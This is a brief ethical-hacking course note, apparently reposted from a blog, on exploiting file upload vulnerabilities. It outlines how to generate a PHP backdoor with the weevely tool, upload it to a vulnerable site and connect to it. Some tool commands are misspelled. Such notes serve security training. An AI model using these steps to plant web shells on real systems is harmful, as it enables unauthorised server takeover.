Ethical Hacking - Web Penetration Testing(3)

EXPLOITATION -File Upload VULNS

Simple type of vulnerabilities.

Allow users to upload executable files such as PHP.

Upload a PHP shell or backdoor, ex:weevly

1. Generate backdoor

weevly generage [password] [file name]

2. Upload the generated file.

3. Connect to it

weevly [URL to file] [password]

4. Find out how to use weevly

help

猜你喜欢

转载自www.cnblogs.com/keepmoving1113/p/12274415.html
今日推荐